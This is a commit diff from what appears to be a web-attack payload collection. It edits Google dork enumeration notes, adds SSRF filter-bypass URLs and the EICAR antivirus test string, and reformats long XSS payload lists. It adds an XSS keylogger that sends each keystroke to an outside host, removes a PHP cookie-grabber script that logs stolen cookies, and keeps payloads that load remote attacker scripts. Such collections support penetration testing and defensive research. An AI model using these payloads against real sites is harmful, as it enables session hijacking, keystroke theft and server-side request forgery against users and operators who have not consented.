XSS Intruder + Eicar + SSRF http://0

Methodology_and_enumeration.md

@@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt
 * Using Google Dorks and Google Transparency Report
 ```bash
 site:*.domain.com -www
-site:http://domain.com filetype:pdf
-site:http://domain.com inurl:&
-site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
-site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:domain.com filetype:pdf
+site:domain.com inurl:'&'
+site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
+site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:*.*.domain.com
 
 You need to include subdomains ;)
 https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true

SSRF injection/README.md

@@ -28,7 +28,7 @@ Advanced exploit using type=url
 ```
 Change "type=file" to "type=url"
 Paste URL in text field and hit enter
-Using this vulnerability users can upload images from any image URL = trigger an SSRF 
+Using this vulnerability users can upload images from any image URL = trigger an SSRF
 ```
 
 ## Bypassing
@@ -58,5 +58,20 @@ localhost:+11211aaa
 localhost:00011211aaaa
 ```
 
+Bypass using rare address
+```
+http://0/
+```
+
+Bypass using tricks combination
+```
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+urllib2 : 1.1.1.1
+requests + browsers : 2.2.2.2
+urllib : 3.3.3.3
+```
+
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
+* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
+* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)

Upload insecure files/Eicar/eicar.com.txt

@@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

XSS injection/Cookie Grabber XSS.php

@@ -1,11 +0,0 @@
-<?php 
-// How to use it
-# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
-
-// Write the cookie in a file
-$cookie = $_GET['c'];
-$fp = fopen('cookies.txt', 'a+');
-fwrite($fp, 'Cookie:' .$cookie.'\r\n');
-fclose($fp);
-
-?>

XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt

@@ -6,78 +6,78 @@
 '-alert(1)//
 \'-alert(1)//
 </script><svg onload=alert(1)>
-<x contenteditable onblur=alert(1)>lose focus! 
-<x onclick=alert(1)>click this! 
-<x oncopy=alert(1)>copy this! 
-<x oncontextmenu=alert(1)>right click this! 
-<x oncut=alert(1)>copy this! 
-<x ondblclick=alert(1)>double click this! 
-<x ondrag=alert(1)>drag this! 
-<x contenteditable onfocus=alert(1)>focus this! 
-<x contenteditable oninput=alert(1)>input here! 
-<x contenteditable onkeydown=alert(1)>press any key! 
-<x contenteditable onkeypress=alert(1)>press any key! 
-<x contenteditable onkeyup=alert(1)>press any key! 
-<x onmousedown=alert(1)>click this! 
-<x onmousemove=alert(1)>hover this! 
-<x onmouseout=alert(1)>hover this! 
-<x onmouseover=alert(1)>hover this! 
-<x onmouseup=alert(1)>click this! 
+<x contenteditable onblur=alert(1)>lose focus!
+<x onclick=alert(1)>click this!
+<x oncopy=alert(1)>copy this!
+<x oncontextmenu=alert(1)>right click this!
+<x oncut=alert(1)>copy this!
+<x ondblclick=alert(1)>double click this!
+<x ondrag=alert(1)>drag this!
+<x contenteditable onfocus=alert(1)>focus this!
+<x contenteditable oninput=alert(1)>input here!
+<x contenteditable onkeydown=alert(1)>press any key!
+<x contenteditable onkeypress=alert(1)>press any key!
+<x contenteditable onkeyup=alert(1)>press any key!
+<x onmousedown=alert(1)>click this!
+<x onmousemove=alert(1)>hover this!
+<x onmouseout=alert(1)>hover this!
+<x onmouseover=alert(1)>hover this!
+<x onmouseup=alert(1)>click this!
 <x contenteditable onpaste=alert(1)>paste here!
-<script>alert(1)// 
+<script>alert(1)//
 <script>alert(1)<!–
-<script src=//brutelogic.com.br/1.js> 
+<script src=//brutelogic.com.br/1.js>
 <script src=//3334957647/1>
-%3Cx onxxx=alert(1) 
-<%78 onxxx=1 
-<x %6Fnxxx=1 
-<x o%6Exxx=1 
-<x on%78xx=1 
+%3Cx onxxx=alert(1)
+<%78 onxxx=1
+<x %6Fnxxx=1
+<x o%6Exxx=1
+<x on%78xx=1
 <x onxxx%3D1
-<X onxxx=1 
-<x OnXxx=1 
-<X OnXxx=1 
+<X onxxx=1
+<x OnXxx=1
+<X OnXxx=1
 <x onxxx=1 onxxx=1
-<x/onxxx=1 
-<x%09onxxx=1 
-<x%0Aonxxx=1 
-<x%0Conxxx=1 
-<x%0Donxxx=1 
-<x%2Fonxxx=1 
-<x 1='1'onxxx=1 
+<x/onxxx=1
+<x%09onxxx=1
+<x%0Aonxxx=1
+<x%0Conxxx=1
+<x%0Donxxx=1
+<x%2Fonxxx=1
+<x 1='1'onxxx=1
 <x 1="1"onxxx=1
-<x </onxxx=1 
-<x 1=">" onxxx=1 
+<x </onxxx=1
+<x 1=">" onxxx=1
 <http://onxxx%3D1/
 <x onxxx=alert(1) 1='
 <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
 'onload=alert(1)><svg/1='
-'>alert(1)</script><script/1=' 
+'>alert(1)</script><script/1='
 */alert(1)</script><script>/*
 */alert(1)">'onload="/*<svg/1='
 `-alert(1)">'onload="`<svg/1='
 */</script>'>alert(1)/*<script/1='
-<script>alert(1)</script> 
-<script src=javascript:alert(1)> 
-<iframe src=javascript:alert(1)> 
-<embed src=javascript:alert(1)> 
-<a href=javascript:alert(1)>click 
-<math><brute href=javascript:alert(1)>click 
-<form action=javascript:alert(1)><input type=submit> 
-<isindex action=javascript:alert(1) type=submit value=click> 
-<form><button formaction=javascript:alert(1)>click 
-<form><input formaction=javascript:alert(1) type=submit value=click> 
-<form><input formaction=javascript:alert(1) type=image value=click> 
-<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
-<isindex formaction=javascript:alert(1) type=submit value=click> 
-<object data=javascript:alert(1)> 
-<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
-<svg><script xlink:href=data:,alert(1) /> 
-<math><brute xlink:href=javascript:alert(1)>click 
+<script>alert(1)</script>
+<script src=javascript:alert(1)>
+<iframe src=javascript:alert(1)>
+<embed src=javascript:alert(1)>
+<a href=javascript:alert(1)>click
+<math><brute href=javascript:alert(1)>click
+<form action=javascript:alert(1)><input type=submit>
+<isindex action=javascript:alert(1) type=submit value=click>
+<form><button formaction=javascript:alert(1)>click
+<form><input formaction=javascript:alert(1) type=submit value=click>
+<form><input formaction=javascript:alert(1) type=image value=click>
+<form><input formaction=javascript:alert(1) type=image src=SOURCE>
+<isindex formaction=javascript:alert(1) type=submit value=click>
+<object data=javascript:alert(1)>
+<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
+<svg><script xlink:href=data:,alert(1) />
+<math><brute xlink:href=javascript:alert(1)>click
 <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
-<html ontouchstart=alert(1)> 
-<html ontouchend=alert(1)> 
-<html ontouchmove=alert(1)> 
+<html ontouchstart=alert(1)>
+<html ontouchend=alert(1)>
+<html ontouchmove=alert(1)>
 <html ontouchcancel=alert(1)>
 <body onorientationchange=alert(1)>
 "><img src=1 onerror=alert(1)>.gif
@@ -85,9 +85,9 @@
 GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
 <script src="data:&comma;alert(1)//
 "><script src=data:&comma;alert(1)//
-<script src="//brutelogic.com.br&sol;1.js&num; 
-"><script src=//brutelogic.com.br&sol;1.js&num; 
-<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
+<script src="//brutelogic.com.br&sol;1.js&num;
+"><script src=//brutelogic.com.br&sol;1.js&num;
+<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
 "><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
 <base href=//0>
 <script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)
@@ -97,9 +97,6 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
 <body onhashchange=alert(1)><a href=#x>click this!#x
 <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
 <body onscroll=alert(1)><br><br><br><br>
-<br><br><br><br><br><br><br><br><br><br>
-<br><br><br><br><br><br><br><br><br><br>
-<br><br><br><br><br><br><x id=x>#x
 <body onresize=alert(1)>press F12!
 <body onhelp=alert(1)>press F1! (MSIE)
 <marquee onstart=alert(1)>

XSS injection/Intruders/RSNAKE_XSS.txt

@@ -1,4 +1,3 @@
-# credit to rsnake
 <SCRIPT>alert('XSS');</SCRIPT>
 '';!--"<XSS>=&{()}
 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

XSS injection/README.md

@@ -18,6 +18,11 @@ fclose($fp);
 ?>
 ```
 
+Keylogger for XSS
+```
+<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
+```
+
 ## XSS in HTML/Applications
 XSS Basic
 ```